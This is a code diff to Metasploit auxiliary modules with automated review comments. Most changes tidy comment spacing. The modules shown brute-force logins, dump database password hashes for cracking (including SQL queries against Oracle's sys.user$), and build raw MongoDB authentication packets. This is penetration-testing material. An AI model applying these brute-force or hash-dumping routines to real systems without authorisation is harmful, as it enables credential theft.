print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if res and res.code == 200
|
||||
case res.body
|
||||
when nil
|
||||
# Nothing
|
||||
# Nothing
|
||||
when /<Version xmlns=".*">(.*)<\/Version><\/getVersionResponse>/
|
||||
version = "#{$1}"
|
||||
success = true
|
||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(
|
||||
'Name' => 'HTTP Page Scraper',
|
||||
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
|
||||
'Author' => ['et'],
|
||||
'Author' => ['et'],
|
||||
'License' => MSF_LICENSE
|
||||
)
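Review bot: The `'Description'` string in this `super(...)` call still carries two spelling errors, `Scrap` and `expresion`, which a commit dedicated to comment and doc corrections should pick up since this text is what users see in the module info. The line should read `'Description' => 'Scrape defined data from a specific web page based on a regular expression',`.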
|
||||
|
||||
|
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
else
|
||||
print_status("Server #{wmap_target_host}:#{datastore['RPORT']} responded to SOAPAction: #{v}#{n} with HTTP: #{res.code} #{res.message}.")
|
||||
## Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
host: ip,
|
||||
proto: 'tcp',
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
||||
|
||||
manual = false
|
||||
#request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
|
||||
# request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
|
||||
res_test = send_request_cgi({
|
||||
'uri' => "http://#{datastore['CANARY_IP']}:80",
|
||||
'method' => 'GET',
|
||||
|
@ -87,17 +87,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if datastore['VERBOSE'] == true
|
||||
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
|
||||
res.body.each_line do |line|
|
||||
#the following is the last line of the useless response
|
||||
# the following is the last line of the useless response
|
||||
if line.to_s =~ /\/\/--><\/SCRIPT>/
|
||||
#setting out = true to print all of the following stuff
|
||||
# setting out = true to print all of the following stuff
|
||||
out = true
|
||||
next
|
||||
end
|
||||
if out == true
|
||||
if line =~ /<META/ or line =~ /<Script/
|
||||
#we are finished :)
|
||||
#the next line is typical code from the website and nothing from us
|
||||
#this means we can skip this stuff ...
|
||||
# we are finished :)
|
||||
# the next line is typical code from the website and nothing from us
|
||||
# this means we can skip this stuff ...
|
||||
out = false
|
||||
next
|
||||
else
|
||||
|
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'dun', #Discovery, PoC
|
||||
'sinn3r' #Metasploit
|
||||
'dun', # Discovery, PoC
|
||||
'sinn3r' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Jul 13 2012"
|
||||
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'sinn3r', #Metasploit
|
||||
'sinn3r', # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -162,8 +162,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
# From the documentation:
|
||||
#
|
||||
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
|
||||
# seconds in order to prevent brute force and dictionary attacks."
|
||||
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
|
||||
# seconds in order to prevent brute force and dictionary attacks."
|
||||
#
|
||||
|
||||
# Zabbix enables a Guest mode by default that allows access to the dashboard without auth
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body)
|
||||
#string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
|
||||
# string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
|
||||
if match = res.body.match(/\<!-- Domino Release(.*) --\>/);
|
||||
server1 = $1
|
||||
report_note(
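Review bot: `if match = res.body.match(/\<!-- Domino Release(.*) --\>/);` ends with a stray `;` and then reads the capture through `$1` although `match` already holds the MatchData; `server1 = match[1]` (and dropping the `;`) avoids the implicit global. The two later Domino hunks (`server2 = $2` with the `Lotus Notes/Domino` title regex, and `server3 = $1` with the `Version=` regex) have the same shape. Parenthesising the assignment, `if (match = …)`, also signals that the assignment-in-condition is intentional.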
|
||||
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body)
|
||||
#string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
|
||||
# string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
|
||||
if match = res.body.match(/\<title\>(.*)Lotus Notes\/Domino (.*) Release Notes\<\/title\>/);
|
||||
server2 = $2
|
||||
print_status("#{ip}:#{rport} Lotus Domino Release Notes Version: " + $2)
|
||||
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body and res.body.index('TotalFileSize') and res.body.index('FileCount'))
|
||||
#string we are regexing: # Regex Version=8.5.1.0
|
||||
# string we are regexing: # Regex Version=8.5.1.0
|
||||
if match = res.body.match(/Version=(.*)/);
|
||||
server3 = $1
|
||||
report_note(
|
||||
|
@ -98,10 +98,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data = http.get(20)
|
||||
|
||||
if data =~ /DVR WebViewer/i
|
||||
#Confirmed ActiveX control over HTTP, display the control name and version
|
||||
#Report HTTP service info since there is a confirmed IE ActiveX control
|
||||
#Code base example:
|
||||
#codebase="CtrWeb.cab#version=1,1,5,4"
|
||||
# Confirmed ActiveX control over HTTP, display the control name and version
|
||||
# Report HTTP service info since there is a confirmed IE ActiveX control
|
||||
# Code base example:
|
||||
# codebase="CtrWeb.cab#version=1,1,5,4"
|
||||
if data.match(/codebase="(\w{1,16})\.(\w{1,3}).version=(\d{1,3},\d{1,3},\d{1,3},\d{1,3})/)
|
||||
v = "#{$1}.#{$2} v#{$3}"
|
||||
else
|
||||
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:info => "IE ActiveX CCTV DVR Control (#{v})"
|
||||
)
|
||||
else
|
||||
#An HTTP server is listening on HTTP_PORT, however, does not appear to be
|
||||
#the ActiveX control
|
||||
# An HTTP server is listening on HTTP_PORT, however, does not appear to be
|
||||
# the ActiveX control
|
||||
print_status("An unknown HTTP interface was found on #{datastore['HTTP_PORT']}/TCP")
|
||||
end
|
||||
|
||||
@ -135,15 +135,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
fill_length1 = 64 - user.length
|
||||
|
||||
#Check if user name length is too long for submission (exceeds packet length)
|
||||
# Check if user name length is too long for submission (exceeds packet length)
|
||||
if fill_length1 < 1
|
||||
return
|
||||
end
|
||||
|
||||
#Build the authentication packet starting here
|
||||
# Build the authentication packet starting here
|
||||
data = "\x00\x01\x00\x00\x80\x00\x00\x00" + user + ("\x00" * fill_length1)
|
||||
|
||||
#Check if password length is too long for submission (exceeds packet length)
|
||||
# Check if password length is too long for submission (exceeds packet length)
|
||||
fill_length2 = 64 - pass.length
|
||||
if fill_length2 < 1
|
||||
return
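Review bot: `fill_length1 = 64 - user.length` counts characters, but the padding `"\x00" * fill_length1` and the 64-byte field are in bytes, so a username containing multibyte characters produces a field longer than 64 bytes while still passing the `< 1` check; the same applies to `fill_length2 = 64 - pass.length` for the password. Using `user.bytesize` and `pass.bytesize` keeps the length check and the padding in the same unit. The method containing this code begins and ends outside the hunk.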
|
||||
@ -164,14 +164,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :abort
|
||||
end
|
||||
|
||||
#Analyze the response
|
||||
# Analyze the response
|
||||
if res == "\x00\x01\x03\x01\x00\x00\x00\x00" #Failed Password
|
||||
vprint_error("#{rhost}:#{rport} Failed login as: '#{user}'")
|
||||
return
|
||||
|
||||
elsif res =="\x00\x01\x02\x01\x00\x00\x00\x00" #Invalid User
|
||||
vprint_error("#{rhost}:#{rport} Invalid user: '#{user}'")
|
||||
#Stop attempting passwords for this user since it doesn't exist
|
||||
# Stop attempting passwords for this user since it doesn't exist
|
||||
return :skip_user
|
||||
|
||||
elsif res =="\x00\x01\x05\x01\x00\x00\x00\x00" or res =="\x00\x01\x01\x01\x00\x00\x00\x00"
|
||||
|
@ -210,9 +210,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print("Version of the InterBase server: #{info_svc_server_version}\n")
|
||||
print("Implementation of the InterBase server: #{info_svc_implementation}\n\n")
|
||||
|
||||
# print(Rex::Text.to_hex_dump(response))
|
||||
#print(Rex::Text.to_hex_dump(response))
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:sname => 'ib',
|
||||
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "Version of the InterBase server: #{info_svc_server_version}"
|
||||
)
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:sname => 'ib',
|
||||
|
@ -49,8 +49,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
|
||||
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
|
||||
|
||||
#check if it is a OKI
|
||||
#OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
|
||||
# check if it is a OKI
|
||||
# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
|
||||
if first_six == "002536" || first_six == "008087" || first_six == "002536"
|
||||
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
||||
print_status("Found: #{sys_name}")
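Review bot: The condition `first_six == "002536" || first_six == "008087" || first_six == "002536"` compares against `"002536"` twice, so the third alternative is dead; either a third OKI OUI was intended and is missing, or the duplicate should go. With only the two prefixes the check reads more clearly as `if %w[002536 008087].include?(first_six)`. The OUI list referenced in the comment is the place to confirm whether a third prefix was meant.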
|
||||
|
@ -65,15 +65,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def require_auth?
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = "\x3f\x00\x00\x00" #messageLength (63)
|
||||
packet << request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\x01\x00\x00\x00" #numberToReturn (1)
|
||||
#query ({"listDatabases"=>1})
|
||||
packet = "\x3f\x00\x00\x00" # messageLength (63)
|
||||
packet << request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (admin.$cmd)
|
||||
packet << "\x00\x00\x00\x00" # numberToSkip (0)
|
||||
packet << "\x01\x00\x00\x00" # numberToReturn (1)
|
||||
# query ({"listDatabases"=>1})
|
||||
packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
|
||||
|
||||
sock.put(packet)
|
||||
@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def auth(user, password, nonce)
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\xff\xff\xff\xff" #numberToReturn (1)
|
||||
packet = request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << datastore['DB'] + ".$cmd" + "\x00" # fullCollectionName (DB.$cmd)
|
||||
packet << "\x00\x00\x00\x00" # numberToSkip (0)
|
||||
packet << "\xff\xff\xff\xff" # numberToReturn (1)
|
||||
|
||||
#{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"}
|
||||
document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65"
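Review bot: The corrected comment `# numberToReturn (1)` still mislabels the value on that line: `"\xff\xff\xff\xff"` is -1 as a little-endian int32, whereas the other headers in this file hard-code 1 as `"\x01\x00\x00\x00"`, so the line should read `packet << "\xff\xff\xff\xff" # numberToReturn (-1)`. Since the commit is touching exactly these trailing comments, this is the place to fix it. The `auth` method continues past the hunk.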
|
||||
@ -109,12 +109,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00"
|
||||
document << Rex::Text.md5(nonce + user + Rex::Text.md5(user + ":mongo:" + password)) + "\x00"
|
||||
document << "\x00"
|
||||
#Calculate document length
|
||||
# Calculate document length
|
||||
document.insert(0, [document.length + 4].pack("L"))
|
||||
|
||||
packet += document
|
||||
|
||||
#Calculate messageLength
|
||||
# Calculate messageLength
|
||||
packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength
|
||||
sock.put(packet)
|
||||
response = sock.recv(1024)
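Review bot: `packet.insert(0, [(packet.length + 4)].pack("L"))` and `document.insert(0, [document.length + 4].pack("L"))` use `"L"`, which is native byte order, while every other length in these methods is written as a little-endian literal such as `"\x3f\x00\x00\x00" # messageLength (63)`; on a big-endian host the two computed lengths would not match the hand-written ones. `pack("V")` pins 32-bit little-endian and keeps the header consistent regardless of platform. The method containing these lines starts and ends outside the hunk.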
|
||||
@ -137,15 +137,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def get_nonce
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = "\x3d\x00\x00\x00" #messageLength (61)
|
||||
packet << request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (test.$cmd)
|
||||
packet = "\x3d\x00\x00\x00" # messageLength (61)
|
||||
packet << request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (test.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\x01\x00\x00\x00" #numberToReturn (1)
|
||||
#query {"getnonce"=>1.0}
|
||||
# query {"getnonce"=>1.0}
|
||||
packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00"
|
||||
|
||||
sock.put(packet)
|
||||
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def have_auth_error?(response)
|
||||
#Response header 36 bytes long
|
||||
# Response header 36 bytes long
|
||||
documents = response[36..1024]
|
||||
#{"errmsg"=>"auth fails", "ok"=>0.0}
|
||||
#{"errmsg"=>"need to login", "ok"=>0.0}
|
||||
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
create_credential_login(login_data)
|
||||
|
||||
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
|
||||
print_status("Instance Name: #{instancename.inspect}")
|
||||
version = mssql_query(mssql_sql_info())[:rows][0][0]
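Review bot: `instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]` yields nil when the server name contains no backslash, which is typically what a default (unnamed) instance reports, so `print_status("Instance Name: #{instancename.inspect}")` prints `nil` rather than something useful; the `[:rows][0][0]` chain also raises if the query returns no rows, though whether `mssql_query` can do that here is not visible in the hunk. Splitting once and falling back, e.g. `instancename = servername.split('\\')[1] || servername`, keeps a usable value, and the same line recurs in the later `Microsoft SQL Server Schema` hunk. The enclosing method starts and ends outside the hunk.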
|
||||
@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#Stores the grabbed hashes as loot for later cracking
|
||||
#The hash format is slightly different between 2k and 2k5/2k8
|
||||
# Stores the grabbed hashes as loot for later cracking
|
||||
# The hash format is slightly different between 2k and 2k5/2k8
|
||||
def report_hashes(mssql_hashes, version_year)
|
||||
|
||||
case version_year
|
||||
@ -154,8 +154,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Grabs the user tables depending on what Version of MSSQL
|
||||
#The queries are different between 2k and 2k/2k8
|
||||
# Grabs the user tables depending on what Version of MSSQL
|
||||
# The queries are different between 2k and 2k/2k8
|
||||
def mssql_hashdump(version_year)
|
||||
is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]
|
||||
|
||||
|
@ -40,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
instancename = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
|
||||
print_status("Instance Name: #{instancename.inspect}")
|
||||
version = mssql_query(mssql_sql_info())[:rows][0][0]
|
||||
output = "Microsoft SQL Server Schema \n Host: #{datastore['RHOST']} \n Port: #{datastore['RPORT']} \n Instance: #{instancename} \n Version: #{version} \n====================\n\n"
|
||||
|
||||
#Grab all the DB schema and save it as notes
|
||||
# Grab all the DB schema and save it as notes
|
||||
mssql_schema = get_mssql_schema
|
||||
return nil if mssql_schema.nil? or mssql_schema.empty?
|
||||
mssql_schema.each do |db|
|
||||
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#Gets all of the Databases on this Instance
|
||||
# Gets all of the Databases on this Instance
|
||||
def get_db_names
|
||||
results = mssql_query(mssql_db_names())[:rows]
|
||||
return results
|
||||
end
|
||||
|
||||
#Gets all the table names for the given DB
|
||||
# Gets all the table names for the given DB
|
||||
def get_tbl_names(db_name)
|
||||
results = mssql_query("SELECT name,id FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
|
||||
return results
|
||||
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [
|
||||
'theLightCosine', # Original hashdump module
|
||||
'jcran' # Authentication bypass bruteforce implementation
|
||||
'jcran' # Authentication bypass bruteforce implementation
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2012-2122'],
|
||||
|
@ -18,11 +18,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MySQL Login Utility',
|
||||
'Name' => 'MySQL Login Utility',
|
||||
'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',
|
||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
]
|
||||
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return mysql_schema
|
||||
end
|
||||
|
||||
#Gets all of the Tables names inside the given Database
|
||||
# Gets all of the Tables names inside the given Database
|
||||
def get_tbl_names(dbname)
|
||||
|
||||
tables=[]
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module scans NFS mounts and their permissions.
|
||||
},
|
||||
'Author' => ['<tebo[at]attackresearch.com>'],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '1999-0170'],
|
||||
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
|
||||
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
resp = sunrpc_call(procedure, "")
|
||||
|
||||
# XXX: Assume that transport is udp and port is 2049
|
||||
# Technically we are talking to mountd not nfsd
|
||||
# Technically we are talking to mountd not nfsd
|
||||
|
||||
report_service(
|
||||
:host => ip,
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Called for each response packet
|
||||
# Called for each response packet
|
||||
def scanner_process(data, shost, sport)
|
||||
@results[shost] ||= { messages: [], peers: [] }
|
||||
@results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)
|
||||
@ -148,14 +148,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
idx = 0
|
||||
peer_tuples = []
|
||||
1.upto(pcnt) do
|
||||
#u_int32 firsttime; /* first time we received a packet */
|
||||
#u_int32 lasttime; /* last packet from this host */
|
||||
#u_int32 restr; /* restrict bits (was named lastdrop) */
|
||||
#u_int32 count; /* count of packets received */
|
||||
#u_int32 addr; /* host address V4 style */
|
||||
#u_int32 daddr; /* destination host address */
|
||||
#u_int32 flags; /* flags about destination */
|
||||
#u_short port; /* port number of last reception */
|
||||
# u_int32 firsttime; /* first time we received a packet */
|
||||
# u_int32 lasttime; /* last packet from this host */
|
||||
# u_int32 restr; /* restrict bits (was named lastdrop) */
|
||||
# u_int32 count; /* count of packets received */
|
||||
# u_int32 addr; /* host address V4 style */
|
||||
# u_int32 daddr; /* destination host address */
|
||||
# u_int32 flags; /* flags about destination */
|
||||
# u_short port; /* port number of last reception */
|
||||
|
||||
_,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack("NNNNNNNn")
|
||||
|
||||
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(ip)
|
||||
return if not check_dependencies
|
||||
|
||||
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
#Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
# Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
# Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
is_11g=false
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
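Review bot: `is_11g=false` and the later `if is_11g==false` tests in this file (hunks @-61 and @-97) compare against a boolean literal; Ruby style is `is_11g = false` here and `unless is_11g` / `if is_11g` at the tests, which read the same and do not depend on the flag never being nil. Only the assignment is in this hunk; the two tests are in the later hunks of the same file. run_host continues past the hunk.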
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
#Get the usernames and hashes for 8g-10g
|
||||
# Get the usernames and hashes for 8g-10g
|
||||
begin
|
||||
if is_11g==false
|
||||
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tbl << row
|
||||
end
|
||||
end
|
||||
#Get the usernames and hashes for 11g
|
||||
# Get the usernames and hashes for 11g
|
||||
else
|
||||
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
results= prepare_exec(query)
|
||||
@ -97,8 +97,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def report_hashes(table, is_11g, ip, service)
|
||||
#reports the hashes slightly differently depending on the version
|
||||
#This is so that we know which are which when we go to crack them
|
||||
# Reports the hashes slightly differently depending on the version
|
||||
# This is so that we know which are which when we go to crack them
|
||||
if is_11g==false
|
||||
jtr_format = "des"
|
||||
else
|
||||
|
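Review bot: The corrected `# Reports the hashes slightly differently depending on the version` sits inside the body of `def report_hashes(table, is_11g, ip, service)`; since this commit is about YARD corrections, it would serve better as the doc block above the `def`, with the parameters spelled out. Something like `# @param is_11g [Boolean] selects the JtR format tag (des for 8g-10g)` is grounded in the visible `jtr_format = "des"` branch; the types of table and service are not visible here, so those tags would need confirming against the callers. The method body continues past the hunk.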
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
# Based vaugely on each_user_pass in AuthBrute
|
||||
# Based vaguely on each_user_pass in AuthBrute
|
||||
def each_sid(&block)
|
||||
@@oracle_sid_fail = []
|
||||
@@oracle_sid_success = []
|
||||
|
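Review bot: `@@oracle_sid_fail = []` and `@@oracle_sid_success = []` are class variables, which Ruby shares across every instance of the class and its subclasses, so each call to `each_sid` resets lists that another instance of this module may be using at the same time. Instance variables (`@oracle_sid_fail = []`, `@oracle_sid_success = []`) keep that state per module instance. A YARD tag for the block would also fit this commit: `# @yield [sid] each SID to attempt`. The method body continues past the hunk.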
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet = sock.read(100)
|
||||
find_packet = packet.include? "(ERROR_STACK=(ERROR="
|
||||
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
|
||||
#TODO: Module should report_vuln if this finding is solid.
|
||||
# TODO: Module should report_vuln if this finding is solid.
|
||||
rescue ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
print_error("#{ip}:#{rport} unable to connect to the server")
|
||||
end
|
||||
|
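Review bot: `packet = sock.read(100)` returns nil when the peer closes the connection before sending anything, and the next line `packet.include? "(ERROR_STACK=(ERROR="` then raises NoMethodError, which the `rescue ::Rex::ConnectionError, ::Errno::EPIPE` below does not catch. Coercing first avoids the crash: `find_packet = packet.to_s.include?("(ERROR_STACK=(ERROR=")`. The ternary on the following line compares a boolean to `true`; `if find_packet` ... `else` is the idiomatic form. The `begin` this rescue belongs to starts before the hunk.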
@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#database links
|
||||
# database links
|
||||
res = send_request_raw({
|
||||
'uri' => '/oradb/PUBLIC/ALL_DB_LINKS',
|
||||
'version' => '1.1',
|
||||
|
@ -74,19 +74,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def do_login(user, pass, nsock=self.sock)
|
||||
#Check if we are already at a logon prompt
|
||||
# Check if we are already at a logon prompt
|
||||
res = nsock.get_once(-1,5)
|
||||
euser = encryption_header(encrypt(user))
|
||||
nsock.put(euser)
|
||||
res = nsock.get_once(-1,5)
|
||||
|
||||
#See if this knocked a login prompt loose
|
||||
# See if this knocked a login prompt loose
|
||||
if pca_at_login?(res)
|
||||
nsock.put(euser)
|
||||
res = nsock.get_once(-1,5)
|
||||
end
|
||||
|
||||
#Check if we are now at the password prompt
|
||||
# Check if we are now at the password prompt
|
||||
unless res and res.include? "Enter password"
|
||||
print_error "Problem Sending Login: #{res.inspect}"
|
||||
return :abort
|
||||
|
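Review bot: The corrected `# Check if we are already at a logon prompt` does not match the code under it: the result of the first `res = nsock.get_once(-1,5)` is never inspected before the second `res = nsock.get_once(-1,5)` overwrites it, so nothing is checked at that point and the read only drains whatever is pending. Either the comment should say so (`# Drain any pending banner before sending the user name`) or the result should be tested with pca_at_login? as the later block does. In `unless res and res.include? "Enter password"` the `and` should be `&&`; `and` binds more loosely than assignment and the style guide reserves it for control flow. do_login continues past the hunk.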
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
begin
|
||||
res = connect
|
||||
res = connect
|
||||
banner = sock.get_once(-1, 30)
|
||||
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
|
||||
print_status("#{ip}:#{rport} POP3 #{banner_sanitized}")
|
||||
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status(" TCP OPEN|FILTERED #{dhost}:#{dport}")
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => dhost,
|
||||
:proto => 'tcp',
|
||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
#Query the Postgres Shadow table for username and password hashes and report them
|
||||
# Query the Postgres Shadow table for username and password hashes and report them
|
||||
